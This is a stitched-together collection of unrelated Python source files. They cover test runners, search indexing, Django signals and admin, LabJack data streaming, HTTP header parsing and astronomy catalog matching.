get_test_runner_kwargs() kwargs['stream'] = StringIO() return kwargs class TestStdoutCapturingTestRunner(TestCase): def _run_suite(self, suite): runner = StderrSuppressingStdoutCapturingTestRunner() return runner.run_suite(suite) def test_with_stdout(self): class LoudTestCase(TestCase): def test(self): print('True is true, who knew!') self.assertTrue(True) loud_suite = TestSuite( tests=defaultTestLoader.loadTestsFromTestCase(LoudTestCase) ) with self.assertRaises(RuntimeError): self._run_suite(loud_suite) def test_with_no_stdout(self): class QuietTestCase(TestCase): def test(self): self.assertTrue(True) quiet_suite = TestSuite( tests=defaultTestLoader.loadTestsFromTestCase(QuietTestCase) ) result = self._run_suite(quiet_suite) # No errors should be raised and the suite should have passed self.assertEqual(result.errors, []) self.assertEqual(result.failures, []) #!/usr/bin/python #coding: utf-8 #建索引的文件 import lucene import csv index_dir = '../../data/index/' data_dir = '../../data/corpus.csv' lucene.initVM() directory = lucene.SimpleFSDirectory(lucene.File(index_dir)) analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT) def build_index(): f = open(data_dir) reader = csv.reader(f) print("开始创建索引") indx = 0 writer = lucene.IndexWriter(directory,analyzer,True, lucene.IndexWriter.MaxFieldLength.UNLIMITED) for line in reader: eng,zh = line[0],line[1] doc = lucene.Document() doc.add(lucene.Field('eng',eng,lucene.Field.Store.YES, lucene.Field.Index.ANALYZED)) doc.add(lucene.Field('zh',zh,lucene.Field.Store.YES, lucene.Field.Index.NOT_ANALYZED)) writer.addDocument(doc) if indx % 100000 == 0: print("%sK"%(indx/1000)) indx += 1 print("写引擎优化") writer.optimize() writer.close() if __name__ == '__main__': build_index() from codecs import open import pandas as pd import json from os import listdir from os.path import isfile, join input_path = 'data/brwac_ref_urls_sentences_v4/' urls = [] files = [] pos = [] file_names = [f for f in listdir(input_path) if isfile(join(input_path, f)) and 'serialized' not in f] j = 0 for file_name in file_names: i = 0 print('({}/{}) {}'.format(j, len(file_names), file_name)) with open(join(input_path, file_name), 'r') as f: for line in f: content = json.loads(line) urls.append(content['docid']) files.append(file_name) pos.append(i) i = i + 1 j = j + 1 df = pd.DataFrame({'docid' : urls, 'file' : files, 'pos' : pos}) df.to_csv(input_path + 'urls_pos.csv', index=False) 10-100 import logging from dateutil.parser import parse from django.apps import apps from django.utils import timezone from django_elasticsearch_dsl.registries import registry from readthedocs.builds.models import Version from readthedocs.projects.models import Project from readthedocs.search.models import SearchQuery from readthedocs.worker import app from .utils import _get_index, _get_document log = logging.getLogger(__name__) @app.task(queue='web') def index_objects_to_es( app_label, model_name, document_class, index_name=None, chunk=None, objects_id=None ): if chunk and objects_id: raise ValueError('You can not pass both chunk and objects_id.') if not (chunk or objects_id): raise ValueError('You must pass a chunk or objects_id.') model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) doc_obj = document() # WARNING: This must use the exact same queryset as from where we get the ID's # There is a chance there is a race condition here as the ID's may change as the task runs, # so we need to think through this a bit more and probably pass explicit ID's, # but there are performance issues with that on large model sets queryset = doc_obj.get_queryset() if chunk: # Chunk is a tuple with start and end index of queryset start = chunk[0] end = chunk[1] queryset = queryset[start:end] elif objects_id: queryset = queryset.filter(id__in=objects_id) if index_name: # Hack the index name temporarily for reindexing tasks old_index_name = document._doc_type.index document._doc_type.index = index_name log.info('Replacing index name %s with %s', old_index_name, index_name) log.info("Indexing model: %s, '%s' objects", model.__name__, queryset.count()) doc_obj.update(queryset.iterator()) if index_name: log.info('Undoing index replacement, settings %s with %s', document._doc_type.index, old_index_name) document._doc_type.index = old_index_name @app.task(queue='web') def delete_objects_in_es(app_label, model_name, document_class, objects_id): model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) doc_obj = document() queryset = doc_obj.get_queryset() queryset = queryset.filter(id__in=objects_id) log.info("Deleting model: %s, '%s' objects", model.__name__, queryset.count()) try: # This is a common case that we should be handling a better way doc_obj.update(queryset.iterator(), action='delete') except Exception: log.warning('Unable to delete a subset of files. Continuing.', exc_info=True) @app.task(queue='web') def create_new_es_index(app_label, model_name, index_name, new_index_name): model = apps.get_model(app_label, model_name) indices = registry.get_indices(models=[model]) old_index = _get_index(indices=indices, index_name=index_name) new_index = old_index.clone(name=new_index_name) new_index.create() @app.task(queue='web') def switch_es_index(app_label, model_name, index_name, new_index_name): model = apps.get_model(app_label, model_name) indices = registry.get_indices(models=[model]) old_index = _get_index(indices=indices, index_name=index_name) new_index = old_index.clone(name=new_index_name) old_index_actual_name = None if old_index.exists(): # Alias can not be used to delete an index. # https://www.elastic.co/guide/en/elasticsearch/reference/6.0/indices-delete-index.html # So get the index actual name to delete it old_index_info = old_index.get() # The info is a dictionary and the key is the actual name of the index old_index_actual_name = list(old_index_info.keys())[0] # Put alias into the new index name and delete the old index if its exist new_index.put_alias(name=index_name) if old_index_actual_name: old_index.connection.indices.delete(index=old_index_actual_name) @app.task(queue='web') def index_missing_objects(app_label, model_name, document_class, index_generation_time): """ Task to insure that none of the object is missed from indexing. The object ids are sent to `index_objects_to_es` task for indexing. While the task is running, new objects can be created/deleted in database and they will not be in the tasks for indexing into ES. This task will index all the objects that got into DB after the `latest_indexed` timestamp to ensure that everything is in ES index. """ model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) query_string = '{}__lte'.format(document.modified_model_field) queryset = document().get_queryset().exclude(**{query_string: index_generation_time}) document().update(queryset.iterator()) log.info("Indexed %s missing objects from model: %s'", queryset.count(), model.__name__) # TODO: Figure out how to remove the objects from ES index that has been deleted @app.task(queue='web') def delete_old_search_queries_from_db(): """ Delete old SearchQuery objects. This is run by celery beat every day. """ last_3_months = timezone.now().date() - timezone.timedelta(days=90) search_queries_qs = SearchQuery.objects.filter( created__date__lte=last_3_months, ) if search_queries_qs.exists(): log.info('Deleting search queries for last 3 months. Total: %s', search_queries_qs.count()) search_queries_qs.delete() @app.task(queue='web') def record_search_query(project_slug, version_slug, query, total_results, time_string): """Record/update search query in database.""" if not project_slug or not version_slug or not query: log.debug( 'Not recording the search query. Passed arguments: ' 'project_slug: %s, version_slug: %s, query: %s, total_results: %s, time: %s' % ( project_slug, version_slug, query, total_results, time_string ) ) return time = parse(time_string) before_10_sec = time - timezone.timedelta(seconds=10) partial_query_qs = SearchQuery.objects.filter( project__slug=project_slug, version__slug=version_slug, created__gte=before_10_sec, ).order_by('-created') # check if partial query exists, # if yes, then just update the object. for partial_query in partial_query_qs.iterator(): if query.startswith(partial_query.query): partial_query.created = time partial_query.query = query partial_query.save() return # don't record query with zero results. if not total_results: log.debug( 'Not recording search query because of zero results. Passed arguments: ' 'project_slug: %s, version_slug: %s, query: %s, total_results: %s, time: %s' % ( project_slug, version_slug, query, total_results, time ) ) return project = Project.objects.filter(slug=project_slug).first() if not project: log.debug( 'Not recording the search query because project does not exist. ' 'project_slug: %s' % ( project_slug ) ) return version_qs = Version.objects.filter(project=project, slug=version_slug) if not version_qs.exists(): log.debug( 'Not recording the search query because version does not exist. ' 'project_slug: %s, version_slug: %s' % ( project_slug, version_slug ) ) return version = version_qs.first() # make a new SearchQuery object. obj = SearchQuery.objects.create( project=project, version=version, query=query, ) obj.created = time obj.save() 100-1000 import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * import ipaddress import traceback ''' COMMAND FUNCTION ''' def return_subnet_network_command(args: Dict[str, Any]) -> CommandResults: subnet = args.get('subnet', None) network = format(ipaddress.IPv4Network(subnet, strict=False).network_address) readable_output = tableToMarkdown(headers='Network:', t=network, name='Subnet Network') return CommandResults( outputs_prefix='IPCalc.IP.Network', outputs_key_field='', readable_output=readable_output, outputs=network, ) ''' MAIN FUNCTION ''' def main(): try: return_results(return_subnet_network_command(demisto.args())) except Exception as ex: demisto.error(traceback.format_exc()) return_error(f'Failed to execute IPCalcReturnSubnetNetwork. Error: {str(ex)}') ''' ENTRY POINT ''' if __name__ in ('__main__', '__builtin__', 'builtins'): main() 1-10 from django.db.models import Q from django.db.models.signals import \ pre_save, \ post_save, \ m2m_changed, \ post_delete from django.conf import settings from django.dispatch import receiver from django.utils.translation import ugettext_lazy as _ from conf.common.mime_settings import FRONTEND_ICON_SET from libs.helpers.strings import shorten_string_to, clean_string, foreign_key_title from libs.sprint.analyser import SprintAnalyser from .api.tasks import send_mentioned_in_message_email, \ send_mentioned_in_description_email from enum import Enum from .models import Project, \ ProjectBacklog, \ IssueTypeCategory, \ IssueStateCategory, \ Sprint, \ Issue, \ IssueMessage, IssueEstimationCategory, SprintEffortsHistory, IssueHistory, IssueTypeCategoryIcon, ProjectWorkingDays class ActionM2M(Enum): PRE_ADD = 'pre_add' POST_ADD = 'post_add' PRE_REMOVE = 'pre_remove' POST_REMOVE = 'post_remove' PRE_CLEAR = 'pre_clear' POST_CLEAR = 'post_clear' @receiver(post_save, sender=Issue) def put_created_issue_to_backlog(instance: Issue, created: bool, **kwargs): """ Lets put just created issue to Backlog. """ if not created: return backlog_with_same_workspace_and_project = ProjectBacklog.objects \ .filter(workspace=instance.workspace, project=instance.project) if backlog_with_same_workspace_and_project.exists(): backlog = backlog_with_same_workspace_and_project.get() backlog.issues.add(instance) """ PROJECT SIGNALS """ @receiver(post_save, sender=Project) def create_backlog_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain only one Backlog. So we provide it. """ if not created: return ProjectBacklog \ .objects \ .create(workspace=instance.workspace, project=instance) @receiver(post_save, sender=Project) def create_project_working_days_settings(instance: Project, created: bool, **kwargs): """ We have to create ProjectWorkingDays for just created Project. So that we will be able to create Sprint and calculate BurnDown Chart entries """ if not created: return """ By default we use 5 working days week and UTC timezone Right now timezone does not affect interface and API Cuz USE_TZ=False """ # @todo i have to implement timezone switcher for projects ProjectWorkingDays\ .objects\ .create( workspace=instance.workspace, project=instance, timezone='UTC', monday=True, tuesday=True, wednesday=True, thursday=True, friday=True, saturday=False, sunday=False ) @receiver(post_save, sender=Project) def create_default_issue_type_category_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain defaults Issue Types So we provide it. @todo Better to add default issue types based on current language of project """ issue_types = IssueTypeCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_types.exists(): # Colors from https://quasar.dev/style/color-palette # Icons from https://materialdesignicons.com/ with 'mdi-' prefix icons = \ IssueTypeCategoryIcon.objects.bulk_create([ # Epic IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bag-personal', color='#b366ff', ordering=3 ), # User Story IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bookmark', color='#8ffc77', ordering=1 ), # Task IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-file-tree', color='#66b3ff', ordering=2 ), # Bug IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bug', color='#f02222', ordering=0 )] ) IssueTypeCategory.objects.bulk_create([ IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Epic'), icon=icons[0], is_subtask=False, is_default=False, ordering=0), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('User Story'), icon=icons[1], is_subtask=True, is_default=True, ordering=1), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Task'), icon=icons[2], is_subtask=True, is_default=False, ordering=2), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Bug'), icon=icons[3], is_subtask=True, is_default=False, ordering=3) ]) @receiver(post_save, sender=Project) def create_default_issue_state_category_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain issue states. So we provide it. @todo Better to add states based on current language of project """ issue_states = IssueStateCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_states.exists(): IssueStateCategory.objects.bulk_create([ IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Todo'), is_default=True, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('In Progress'), is_default=False, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Verify'), is_default=False, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Done'), is_default=False, is_done=True) ]) @receiver(post_save, sender=Project) def create_default_issue_estimation_for_project(instance: Project, created: bool, **kwargs): issue_estimations = IssueEstimationCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_estimations.exists(): IssueEstimationCategory\ .objects\ .bulk_create([ IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XS'), value=1), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('SM'), value=2), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('M'), value=3), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('L'), value=5), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XL'), value=8), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XXL'), value=13) ]) @receiver(pre_save, sender=Sprint) def create_sprint_history_first_entry_and_set_issues_state_to_default(instance: Sprint, **kwargs): """ Create first history entry for just started sprint """ if not instance.pk: return """ We need to understand state of sprint before. to catch sprint is_started=False -> is_started=True """ state_before = Sprint.objects.get(pk=instance.pk) if any([not instance.is_started, # If updated instance is not start state_before.is_started, # If old instance is started already instance.is_completed]): # Or if updated instance already completed return """ Lets get the default state category """ default_issue_state = IssueStateCategory \ .objects \ .filter( workspace=instance.workspace, project=instance.project, is_default=True ) \ .get() """ We will use it for bulk update then """ objects = [] for issue in instance.issues.all(): issue.state_category = default_issue_state objects.append(issue) """ Updating issues by bulk update """ Issue.objects.bulk_update(objects, ['state_category']) """ If this Sprint was just created - we have to create first History Entry. """ project_standard_working_days = ProjectWorkingDays \ .objects \ .get(workspace=instance.workspace, project=instance.project) """ Analysing sprint to get total story points """ sprint_analyser = SprintAnalyser(instance, project_standard_working_days) """ Creating Sprint Efforts History entry with zero completed efforts """ SprintEffortsHistory \ .objects \ .create( sprint=instance, workspace=instance.workspace, project=instance.project, point_at=instance.started_at, total_value=sprint_analyser.calculate_total_story_points(), done_value=sprint_analyser.calculate_completed_story_points() # We can set 0 here, but let's calculate it so far ) @receiver(m2m_changed, sender=Sprint.issues.through) @receiver(m2m_changed, sender=ProjectBacklog.issues.through) def arrange_issue_in_sprints(sender, action, instance, **kwargs): """ 1) Find any sprints that have the same issues. 2) Iterate all over sprints to remove issues that bind to sprint or Backlog from sprints. """ if action != ActionM2M.POST_ADD.value: return base_query = Q(issues__in=instance.issues.all()) additional_query = { sender is Sprint.issues.through: ~Q(id=instance.pk), sender is ProjectBacklog.issues.through: Q() }[True] sprint_with_intersection_of_issues = Sprint.objects \ .filter(base_query, additional_query) if not sprint_with_intersection_of_issues.exists(): return to_remove = instance.issues.values_list('id', flat=True) for _sprint in sprint_with_intersection_of_issues.all(): _sprint.issues.remove(*to_remove) @receiver(m2m_changed, sender=Sprint.issues.through) def arrange_issue_in_backlog(action, instance, **kwargs): """ 1) Find Backlog that have same issues as sender Sprint. 2) Remove that issues from Backlog. """ """ We need to track only post add action """ if action != ActionM2M.POST_ADD.value: return base_query = Q(workspace=instance.workspace) & Q(project=instance.project) & Q(issues__in=instance.issues.all()) to_remove = instance.issues.values_list('id', flat=True) try: backlog = ProjectBacklog.objects.filter(base_query).get() backlog.issues.remove(*to_remove) except ProjectBacklog.DoesNotExist: pass @receiver(post_save, sender=IssueMessage) def signal_mentioned_in_message_emails(instance: IssueMessage, created: bool, **kwargs): """ 1) Check if someone was mentioned 2) Send an email if someone was mentioned """ if any([not created, settings.DEBUG, settings.TESTING]): return send_mentioned_in_message_email.delay(instance.pk) @receiver(post_save, sender=Issue) def signal_mentioned_in_description_emails(instance: Issue, created: bool, **kwargs): """ Send an email if someone was mentioned in issue description """ if any([not created, settings.DEBUG, settings.TESTING]): return send_mentioned_in_description_email.delay(instance.pk) @receiver(post_save, sender=Issue) def signal_sprint_estimation_change(instance: Issue, created: bool, **kwargs): """ Create Sprint Estimation on changing Issue, that belong to started sprint We watching such changes as estimation category and state category """ """ First of all getting started sprint to understand do this issue belong to it""" sprint = Sprint.objects \ .filter(workspace=instance.workspace, project=instance.project, is_started=True, issues__in=[instance]) """ If we don't have a started sprint or this sprint do not include current issue then we just exit """ if not sprint.exists(): return sprint_instance = sprint.get() """ If this Sprint was just created - we have to create first History Entry. """ project_standard_working_days = ProjectWorkingDays \ .objects \ .get(workspace=instance.workspace, project=instance.project) """ Analysing sprint to get total story points """ sprint_analyser = SprintAnalyser(sprint_instance, project_standard_working_days) last_history_entry = SprintEffortsHistory \ .objects \ .filter( workspace=instance.workspace, project=instance.project, sprint=sprint_instance ) \ .order_by('-point_at') \ .first() total_sp = sprint_analyser.calculate_total_story_points() completed_sp = sprint_analyser.calculate_completed_story_points() if all([last_history_entry.total_value == total_sp, last_history_entry.done_value == completed_sp]): return sprint_history = SprintEffortsHistory( workspace=instance.workspace, project=instance.project, sprint=sprint_instance, total_value=total_sp, done_value=completed_sp ) sprint_history.save() def set_default_for_instance(instance, sender): """ Just set default is somehow default value was deleted. """ if not instance.is_default: return categories = sender.objects \ .filter(workspace=instance.workspace, project=instance.project) if not categories.exists() or categories.filter(is_default=True).exists(): return new_default_category = categories.all().order_by('id').first() new_default_category.is_default = True new_default_category.save() @receiver(post_delete, sender=IssueTypeCategory) def signal_set_issue_type_category_by_default_if_no_exists(instance: IssueTypeCategory, **kwargs): return set_default_for_instance(instance=instance, sender=IssueTypeCategory) @receiver(post_delete, sender=IssueStateCategory) def signal_set_issue_state_category_by_default_if_no_exists(instance: IssueStateCategory, **kwargs): return set_default_for_instance(instance=instance, sender=IssueStateCategory) @receiver(pre_save, sender=Issue) def signal_set_issue_history(instance: Issue, **kwargs): """ Create History Entry on Issue Changing Pre_save signal is crucial cuz we have to compare instance data with database values. """ if not instance.id: return all_fields = Issue._meta.concrete_fields db_version = Issue.objects.get(pk=instance.id) for field in all_fields: _db_value = getattr(db_version, field.name) _instance_value = getattr(instance, field.name) """ If value is the same or we decided do not track it - let's skip it in creating history entry""" if _db_value == _instance_value or \ field.name in settings.PMDRAGON_ISSUE_DO_NOT_WATCH_FIELDS: continue _edited_field_verbose_name = field.verbose_name if field.name in settings.PMDRAGON_ISSUE_FOREIGN_DATA: _str_before = foreign_key_title(_db_value) _str_after = foreign_key_title(_instance_value) else: _str_before = clean_string(_db_value) _str_after = clean_string(_instance_value) _str_before = shorten_string_to(_str_before, 60) _str_after = shorten_string_to(_str_after, 60) """ Issue history instance """ history_entry = IssueHistory( issue=instance, entry_type=FRONTEND_ICON_SET + 'playlist-edit', edited_field=_edited_field_verbose_name, before_value=_str_before, after_value=_str_after, changed_by=instance.updated_by ) history_entry.save() @receiver(post_save, sender=Issue) def signal_set_create_issue_history(instance: Issue, created: bool, **kwargs): """ Create History Entry on Issue Creation """ if not created: return history_entry = IssueHistory( issue=instance, entry_type=FRONTEND_ICON_SET + 'playlist-plus', edited_field=None, before_value=None, after_value=None, changed_by=instance.updated_by ) history_entry.save() import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sisjuridico.settings.production") #application = get_wsgi_application() from dj_static import Cling application = Cling(get_wsgi_application()) """ t7_streaming_internal.py Collects streaming data. Data is acquired at a user-defined `samplerate` up to 100000 samples/s. The effective sampling rate per channel is the `samplerate` divided by the number of channels (the default lowest resolution is used for maximum sample rate). Data blocks are collected at a user-defined `readrate' in seconds. Typical values of 0.5 seconds are used for high sample rates. A closed-loop PI controller aiming for a user-defined LabJack backlog is used to account for oscillations in the sleep time between block retrieves. This is accomplished by adjusting the duration of the wait between blocks of data in real time. Once the streaming starts, data must be pulled from the LabJack buffer at the appropriate rate to avoid an overflow. The `backlogSP` parameter defines the backlog set point. Values around 10 % seem reasonable for an itnernal clock streaming. However, `backlogSP` and the PI gains `kp` and `ki` should be adjusted accordingly based on the application. The PI loop is especially useful for extended periods of data acquisition on a T7. On this device, the backlog will drift upwards if a fixed wait time between blocks is used. To observe that behavior, set `kp=0` and `ki=0`. Setup: In this example code, 2 PWM signals are generated on ports FIO0 and FIO4, which in turn should be connected respectively to ports AIN0 and AIN1. The LabJack methods in this example are: set_PWM .......... Sets LabJack configuration for PWM output set_dutycycle .... Sets duty cycle of PWM output (-100 to 100) set_stream ....... Sets LabJack configuration for data streaming get_stream ....... Gets streaming data stop_stream ...... Stops data streaming close ............ Closes the LabJack device """ import time import numpy as np from labjack_unified.utils import plot_line from labjack_unified.devices import LabJackT7 # Connecting to LabJackT7 lj = LabJackT7() # Assigning streaming parameters samplerate = 100000 # Samples/s readrate = 0.5 # Block size (s) nblocks = 60 # Number of acquired blocks portlist = ['AIN0', 'AIN1'] # Creating array with dummy values to enable concatenation data = np.zeros((1, len(portlist))) # PI closed loop control of "backlog" size backlogSP = 10 # Desired "backlog" value (%) backlog = [] # Backlog data eprev = 0 # Initial error value uprev = 1 # Initial execution period adjustment factor kp = 0.01 # Proportional gain ki = 0.001 # Integral gain # Setting a PWM output lj.set_pwm(pwmnum=2, frequency=183) lj.set_dutycycle(value1=25, value2=50) # Configuring and starting streaming lj.set_stream(portlist, scanrate=samplerate, readrate=readrate) # Waiting for first block to become available time.sleep(readrate) # Executing acquisition loop for i in range(nblocks): # Starting computational overhead time watch t0 = time.time() # Getting one block of data dt, datablock, numscans, commbacklog, devbacklog = lj.get_stream() # Concatenating last 2 blocks of data for plotting if i > nblocks-3: data = np.vstack((data, datablock)) # Calculating backlog error to set point value e = backlogSP - devbacklog # Calculating execution period adjustment factor u = uprev + kp*(e-eprev) + ki*readrate*e # Updating previous values eprev = e uprev = u # Storing backlog backlog.append(devbacklog) # Showing statistics print('Block :', i+1) print('Scans :', numscans) print('Comm Backlog : {:0.1f}'.format(commbacklog)) print('U3 Backlog : {:0.1f}'.format(devbacklog)) # Pausing taking into account computation overhead thead = time.time()-t0 time.sleep(max(0, u*(readrate-thead))) # Stopping streaming lj.stop_stream() # Closing LabJack lj.close() del lj # Removing first row of dummy data data = data[1::, :] # Creating time array t = dt * np.linspace(0, data.shape[0]-1, data.shape[0]) # Setting x and y arrays for plotting naxes = len(portlist) x = [t] * naxes y = [data[:, i] for i in range(naxes)] # Plotting results plot_line(x, y, yname=portlist, axes='multi') plot_line([np.arange(nblocks)], [backlog], xname='Block Number', yname=['LabJack Backlog (%)']) festicket/connect-sdk-python3 import re def get_header_value(headers, header_name): """ :return: The value of the header with the given name, or None if there was no such header. """ if headers is None: return None for name, value in headers.items(): if name.lower() == header_name.lower(): return value return None def get_header(headers, header_name): """ :return: The header with the given name as a tuple with the name and value, or None if there was no such header. """ if headers is None: return None for name, value in headers.items(): if name.lower() == header_name.lower(): return name, value return None def get_disposition_filename(headers): """ :return: The value of the filename parameter of the Content-Disposition header, or None if there was no such header or parameter. """ header_value = get_header_value(headers, "Content-Disposition") if header_value is None: return None pattern = re.compile( "(?:^|;)\\s*filename\\s*=\\s*(.*?)\\s*(?:;|$)", re.IGNORECASE) match = pattern.search(header_value) if match is not None: filename = match.group(1) return __trim_quotes(filename) return None def __trim_quotes(filename): if len(filename) < 2: return filename if (filename.startswith("\"") and filename.endswith("\"")) or \ (filename.startswith("'") and filename.endswith("'")): return filename[1:-1] return filename 0 from django.contrib import admin from datastores.models import (PostgresDatastore, AzureDatastore, OneDriveDatastore, GoogleDriveDatastore, DropboxDatastore, GoogleCloudStorageDatastore, AzureBlobStorageDatastore, AmazonS3Datastore) admin.site.register(PostgresDatastore) admin.site.register(AzureDatastore) admin.site.register(OneDriveDatastore) admin.site.register(GoogleDriveDatastore) admin.site.register(DropboxDatastore) admin.site.register(GoogleCloudStorageDatastore) admin.site.register(AzureBlobStorageDatastore) admin.site.register(AmazonS3Datastore) # ----- Info ------------------------------------------------------------------ __author__ = ' <>' # ----- Imports --------------------------------------------------------------- from tinyAPI.base.services.ffmpeg import Ffmpeg import tinyAPI import unittest # ----- Tests ----------------------------------------------------------------- class FfmpegTestCase(unittest.TestCase): def test_get_geometry(self): ffmpeg = Ffmpeg('/opt/tinyAPI/base/services/tests/files/video.mov') width, height = ffmpeg.get_geometry() self.assertEqual(160, width) self.assertEqual(120, height) self.assertEqual(160, ffmpeg.width) self.assertEqual(120, ffmpeg.height) def test_get_duration(self): ffmpeg = Ffmpeg('/opt/tinyAPI/base/services/tests/files/video.mov') duration = ffmpeg.get_duration() self.assertEqual(13, duration) # ----- Main ------------------------------------------------------------------ if __name__ == '__main__': unittest.main() # # -*- coding: utf-8 -*- # # @Author: Arrack # @Date: 2020-04-26 21:50:59 # @Last modified by: Arrack # @Last Modified time: 2020-04-27 16:50:01 # import os from app import create_app from dotenv import load_dotenv dotenvPath = os.path.join(os.path.dirname(__file__), '.env') if os.path.exists(dotenvPath): load_dotenv(dotenvPath) app = create_app() if __name__ == '__main__': app.run(debug=True) import perfect from perfect import decorator def test_repr(): id_ = hex(id(perfect)) assert str(perfect) == f"" assert str(perfect.decorator) != f"" assert str(decorator) == str(perfect.decorator) assert repr(perfect) == f"" assert repr(perfect.decorator) != f"" assert repr(decorator) == repr(perfect.decorator) assert perfect is not perfect.decorator assert perfect is not decorator assert perfect.decorator is decorator assert str(perfect()) != f"" assert str(perfect.decorator()) != f"" assert str(decorator()) != f"" assert repr(perfect()) != f"" assert repr(perfect.decorator()) != f"" assert repr(decorator()) != f"" assert str(perfect()).startswith("" assert str(perfect.decorator) != f"" assert str(decorator) == str(perfect.decorator) def wrapped_func(): pass func_id = hex(id(wrapped_func)) func = perfect(wrapped_func) start_str = "function test_wrapped_repr..wrapped_func at" assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect(4711, 1338, a=1, b=2, **{"id": 55})(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect.decorator(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect.decorator()(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" py/desitarget/tychomatch.py0 # Licensed under a 3-clause BSD style license - see LICENSE.rst # -*- coding: utf-8 -*- """ ===================== desitarget.tychomatch ===================== Useful Tycho catalog matching and manipulation routines. """ import os import numpy as np import fitsio import requests import pickle from datetime import datetime from pkg_resources import resource_filename from time import time from astropy.io import ascii from glob import glob import healpy as hp from desitarget import io from desitarget.internal import sharedmem from desimodel.footprint import radec2pix from desitarget.geomask import add_hp_neighbors, radec_match_to, nside2nside # ADM set up the DESI default logger from desiutil.log import get_logger log = get_logger() # ADM start the clock start = time() # ADM columns contained in our version of the Tycho fits files. tychodatamodel = np.array([], dtype=[ ('TYC1', '>i2'), ('TYC2', '>i2'), ('TYC3', '|u1'), ('RA', '>f8'), ('DEC', '>f8'), ('MEAN_RA', '>f8'), ('MEAN_DEC', '>f8'), ('SIGMA_RA', '>f4'), ('SIGMA_DEC', '>f4'), # ADM these are converted to be in mas/yr for consistency with Gaia. ('PM_RA', '>f4'), ('PM_DEC', '>f4'), ('SIGMA_PM_RA', '>f4'), ('SIGMA_PM_DEC', '>f4'), ('EPOCH_RA', '>f4'), ('EPOCH_DEC', '>f4'), ('MAG_BT', '>f4'), ('MAG_VT', '>f4'), ('MAG_HP', '>f4'), ('ISGALAXY', '|u1'), ('JMAG', '>f4'), ('HMAG', '>f4'), ('KMAG', '>f4'), ('ZGUESS', '>f4') ]) def get_tycho_dir(): """Convenience function to grab the Tycho environment variable. Returns ------- :class:`str` The directory stored in the $TYCHO_DIR environment variable. """ # ADM check that the $TYCHO_DIR environment variable is set. tychodir = os.environ.get('TYCHO_DIR') if tychodir is None: msg = "Set $TYCHO_DIR environment variable!" log.critical(msg) raise ValueError(msg) return tychodir def get_tycho_nside(): """Grab the HEALPixel nside to be used throughout this module. Returns ------- :class:`int` The HEALPixel nside number for Tycho file creation and retrieval. """ nside = 4 return nside def grab_tycho(cosmodir="/global/cfs/cdirs/cosmo/staging/tycho2/"): """Retrieve the cosmo versions of the Tycho files at NERSC. Parameters ---------- cosmodir : :class:`str` The NERSC directory that hosts the Tycho files. Returns ------- Nothing But the Tycho fits file, README are written to $TYCHO_DIR/fits. Notes ----- - The environment variable $TYCHO_DIR must be set. - The fits file is "cleaned up" to conform to DESI Data Systems standards (e.g. all columns are converted to upper-case). """ # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() # ADM construct the directory to which to write files. fitsdir = os.path.join(tychodir, 'fits') # ADM the directory better be empty for the copy! if os.path.exists(fitsdir): if len(os.listdir(fitsdir)) > 0: msg = "{} should be empty to get TYCHO FITS file!".format(fitsdir) log.critical(msg) raise ValueError(msg) # ADM make the directory, if needed. else: log.info('Making TYCHO directory for storing FITS files') os.makedirs(fitsdir) # ADM the actual name of the Tycho file and the associated README. tychofn = "tycho2.kd.fits" cosmofile = os.path.join(cosmodir, tychofn) rfile = os.path.join(cosmodir, "README") # ADM the associated output files. outfile = os.path.join(fitsdir, tychofn) routfile = os.path.join(fitsdir, "README") # ADM read in the Tycho file and header in upper-case. objs, hdr = fitsio.read(cosmofile, header=True, upper=True) nobjs = len(objs) done = np.zeros(nobjs, dtype=tychodatamodel.dtype) for col in tychodatamodel.dtype.names: # ADM proper motions need converted to mas/yr. if "PM" in col: done[col] = objs[col]*1000 else: done[col] = objs[col] # ADM add some information to the header copydate = datetime.utcnow().isoformat(timespec='seconds') hdr["COSMODIR"] = cosmodir hdr["COPYDATE"] = copydate # ADM write the data. fitsio.write(outfile, done, extname='TYCHOFITS', header=hdr) # ADM also update the README. 